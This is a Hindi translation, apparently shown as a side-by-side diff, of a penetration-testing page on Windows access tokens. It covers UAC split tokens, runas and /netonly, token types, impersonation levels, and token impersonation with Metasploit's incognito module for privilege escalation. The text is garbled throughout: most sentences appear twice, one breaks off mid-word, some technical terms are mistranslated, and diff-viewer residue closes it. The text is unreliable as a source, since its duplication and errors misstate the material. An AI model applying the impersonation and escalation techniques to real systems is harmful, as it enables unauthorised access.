जब स्थानीय प्रशासक लॉगिन करता है, **दो पहुंच टोकन बनाए जाते हैं**: एक वाणिज्यिक अधिकारों वाला और दूसरा सामान्य अधिकारों वाला। **डिफ़ॉल्ट रूप से**, जब यह उपयोगकर्ता कोई प्रक्रिया चलाता है, तो **सामान्य** (गैर-प्रशासक) **अधिकार वाला उपयोग होता है**। जब यह उपयोगकर्ता किसी भी प्रशासक के रूप में कुछ भी **चलाने** की कोशिश करता है ("एडमिनिस्ट्रेटर के रूप में चलाएं" उदाहरण के लिए), तो **UAC** अनुमति के लिए पूछने के लिए उपयोग होगा।\ जब एक स्थानीय प्रशासक लॉगिन करता है, **दो एक्सेस टोकन बनाए जाते हैं**: एक विशेषाधिकारों वाला और दूसरा सामान्य अधिकारों वाला। **डिफ़ॉल्ट** रूप से, जब यह उपयोगकर्ता प्रक्रिया निष्क्रिय करता है तो **सामान्य** (प्रशासक नहीं) **अधिकारों वाला उपयोग किया जाता है**। जब यह उपयोगकर्ता किसी भी चीज़ को **प्रशासक के रूप में** चलाने की कोशिश करता है ("प्रशासक के रूप में चलाएं" उदाहरण के लिए) तो **UAC** अनुमति के लिए पूछने के लिए उपयोग किया जाएगा।\
यदि आप [**UAC के बारे में और अधिक जानना चाहते हैं तो इस पृष्ठ को पढ़ें**](../authentication-credentials-uac-and-efs.md#uac)**.** यदि आप [**UAC के बारे में अधिक जानना चाहते हैं तो इस पृष्ठ को पढ़ें**](../authentication-credentials-uac-and-efs.md#uac)****
### प्रमाणपत्र उपयोगकर्ता अनुकरण ### प्रमाणों उपयोगकर्ता प्रतिनिधित्व
यदि आपके पास किसी अन्य उपयोगकर्ता के **वैध प्रमाणपत्र** हैं, तो आप उन प्रमाणपत्रों के साथ एक **नई लॉगऑन सत्र** बना सकते हैं: यदि आपके पास **किसी अन्य उपयोगकर्ता के मान्य प्रमाण हैं**, तो आप उन प्रमाणों के साथ एक **नया लॉगऑन सत्र बना सकते हैं** :
``` ```
runas /user:domain\username cmd.exe runas /user:domain\username cmd.exe
``` ```
एक्सेस टोकन में **LSASS** के अंदर लॉगऑन सत्र का **संदर्भ** भी होता है, यह उपयोगी होता है अगर प्रक्रिया को नेटवर्क के कुछ ऑब्जेक्ट्स तक पहुंच की आवश्यकता हो।\ **एक्सेस टोकन** में **LSASS** के अंदर लॉगऑन सत्र का **संदर्भ** भी होता है, यह उपयोगी है अगर प्रक्रिया को नेटवर्क के कुछ ऑब्जेक्ट्स तक पहुंचने की आवश्यकता हो।\
आप नेटवर्क सेवाओं तक पहुंच के लिए **विभिन्न क्रेडेंशियल का उपयोग करने वाली प्रक्रिया** चला सकते हैं: आप नेटवर्क सेवाओं तक पहुंचने के लिए **विभिन्न क्रेडेंशियल का उपयोग करने वाली प्रक्रिया लॉन्च** कर सकते हैं:
``` ```
runas /user:domain\username /netonly cmd.exe runas /user:domain\username /netonly cmd.exe
``` ```
यह उपयोगी होता है यदि आपके पास नेटवर्क में ऑब्जेक्ट तक पहुंच के लिए उपयोगी क्रेडेंशियल हैं, लेकिन वे क्रेडेंशियल मौजूदा होस्ट के अंदर मान्य नहीं हैं क्योंकि वे केवल नेटवर्क में उपयोग होंगे (मौजूदा होस्ट में आपकी मौजूदा उपयोगकर्ता विशेषाधिकार का उपयोग किया जाएगा)। यह उपयोगी है अगर आपके पास नेटवर्क में ऑब्जेक्ट्स तक पहुंचने के लिए उपयोगी क्रेडेंशियल्स हैं, लेकिन वे क्रेडेंशियल्स मौजूदा होस्ट के अंदर मान्य नहीं हैं क्योंकि वे केवल नेटवर्क में उपयोग के लिए होंगे (मौजूदा होस्ट में आपकी वर्तमा उपयोगकर्ता विशेषाधिकार का उपयोग किया जाएगा)।
### टोकन के प्रकार ### टोकन के प्रकार
दो प्रकार के टोकन उपलब्ध होते हैं: दो प्रकार के टोकन उपलब्ध हैं:
* **प्राथमिक टोकन**: प्राथमिक टोकन केवल **प्रक्रियाओं से संबद्ध किए जा सकते हैं**, और वे प्रक्रिया की सुरक्षा विषय को प्रतिष्ठित करते हैं। प्राथमिक टोकन के निर्माण और उनके प्रक्रियाओं से संबद्ध करने दोनों विशेषाधिकारिता की आवश्यकता होती है - प्राथमिक टोकन का निर्माण आमतौर पर प्रमाणीकरण सेवा द्वारा किया जाता है, और एक लॉगऑन सेवा उपयोगकर्ता के ऑपरेटिंग सिस्टम शैली से इसे संबद्ध करती है। प्रक्रियाएं प्राथमिक टोकन की मूल प्रक्रिया की प्रतिलिपि को आधिकारिक रूप से अनुग्रहित करती हैं। * **प्राथमिक टोकन**: प्राथमिक टोकन केवल **प्रक्रियाओं से संबंधित** हो सकते हैं, और वे प्रक्रिया की सुरक्षा विषय का प्रतिनिधित्व करते हैं। प्राथमिक टोकनों की रचना और उनके प्रक्रियाओं से संबंधित करना दोनों विशेषाधिकारित ऑपरेशन हैं, जिसे विशेषधिकार विभाजन के नाम पर दो विशेषाधिकारों की आवश्यकता होती है - सामान्य स्थिति में प्रमाणीकरण सेवा टोकन बनाती है, और लॉगऑन सेवा इसे उपयोगकर्ता के ऑपरेटिंग सिस्टम शैली से संबंधित करती है। प्रक्रियाएँ पहले माता प्रक्रिया के प्राथमिक टोकन की प्रतियांतरण करती हैं।
* **अनुकरण टोकन**: अनुकरण एक सुरक्षा अवधारणा है जो Windows NT में लागू होती है और इसके माध्यम से एक सर्वर एप्लिकेशन को सुरक्षित ऑब्जेक्ट्स तक पहुंच के मामले में अस्थायी रूप से "ग्राहक" के रूप में कार्य करने की अनुमति देती है। अनुकरण के चार संभावित स्तर होते हैं: * **अनुकरण टोकन**: अनुकरण एक सुरक्षा अवधारणा है जो Windows NT में लागू की गई है जो एक सर्वर एप्लिकेशन को सुरक्षित ऑब्जेक्ट्स तक पहुंच के मामले में अस्थायी रूप से "**ग्राहक**" के रूप में "**होने**" की अनुमति देती है। अनुकरण के **चार संभावित स्तर** हैं:
* **अनामक**, जो सर्वर को एक अनामक / अज्ञात उपयोगकर्ता की पहुंच देता है * **अनामित**, सर्वर को एक अनामित/अज्ञात उपयोगकर्ता की पहुंच देना
* **पहचान**, जो सर्वर को ग्राहक की पहचान जांचने देता है लेकिन उस पहचान का उपयोग ऑब्जेक्ट्स तक पहुंच करने के लिए नहीं कर सकता * **पहचान**, सर्वर को ग्राहक की पहचान जांचने देना लेकिन उस पहचान का उपयोग ऑब्ज
* **अनुकरण**, जो सर्वर को ग्राहक के पक्ष में कार्य करने देता है
* **प्रतिनिधित्व**, अनुकरण के समान है लेकिन इसे सर्वर कनेक्ट करने के लिए दूरस्थ प्रणालियों तक विस्तारित किया जाता है (प्रमाणों के संरक्षण के माध्यम से)।
ग्राहक सर्वर के रूप में उपलब्ध अधिकतम अनुकरण स्तर (यदि कोई हो) को एक कनेक्शन पैरामीटर के रूप में चुन सकता है। अनुकरण और अनुकरण विशेषाधिकारिता की आवश्यकता होती है (अनुकरण पहले नहीं था, लेकिन ग्राहक API के अनुमति सीमित करने के लिए डिफ़ॉल्ट स्तर को "पहचान" तक सीमित न करने के इतिहासिक लापरवाही के कारण, जिससे एक अनुचित ग्राहक को अनुकरण करने की अनुमति दी जाती है)। **अनुकरण टोकन केवल थ्रेड्स से संबद्ध किए जा सकते हैं**, और वे ग्राहक प्रक्रिया की सुरक्षा विषय को प्रतिष्ठित करते हैं। अनुकरण टोकन आमतौर पर ब्यापार के माध्यम से वर्तमान थ्रेड के लिए स्वतः ही निर्मित और संबद्ध किए जाते हैं, जैसे DCE RPC, DDE और नेम्ड पाइप्स जैसे IPC मेकेनिज़मों द्वारा।
#### अनुकरण टोकन
मेटास्प्लोइट के _**incognito**_\*\* मॉड्यूल\*\* का उपयोग करके यदि आपके पास पर्याप्त विशेषाधिकार हैं, तो आप आसानी से अन्य **टोकनों** की **सूची** और **अनुकरण** कर सकते हैं। यह दूसरे उपयोगकर्ता के रूप में कार्यवाही करने के लिए उपयोगी हो सकता है। इस तकनीक के साथ आप विशेषाधिकारों को भी बढ़ा सकते हैं।
### टोकन विशेषाधिकार
यह जानें कि कौन से **टोकन विशेषाधिकार** विशेषाधिकारों को बढ़ाने के लिए उपयोग किए जा सकते हैं:
{% content-ref url="privilege-escalation-abusing-tokens/" %}
[privilege-escalation-abusing-tokens](privilege-escalation-abusing-tokens/)
{% endcontent-ref %}
[**इस बाहरी पृष्ठ पर सभी संभावित टोकन विशेषाधिकारों और कुछ परिभाषाएं देखें**](https://github.com/gtworek/Priv2Admin)।
## संदर्भ
इस ट्यूटोरियल में टोकन के बारे में और अधिक जानें: [https://medium.com/@seemant.bisht24/understanding-and-abusing-process-tokens-part-i-ee51671f2cfa](https://medium.com/@seemant.bisht24/understanding-and-abusing-process-tokens-part-i-ee51671f2cfa) और [https://medium.com/@seemant.bisht24/understanding-and-abusing-access-tokens-part-ii-b9069f432962](https://medium.com/@seemant.bisht24/understanding-and-abusing-access-tokens-part-ii-b9069f432962)
<details>

Some files were not shown because too many files have changed in this diff Show more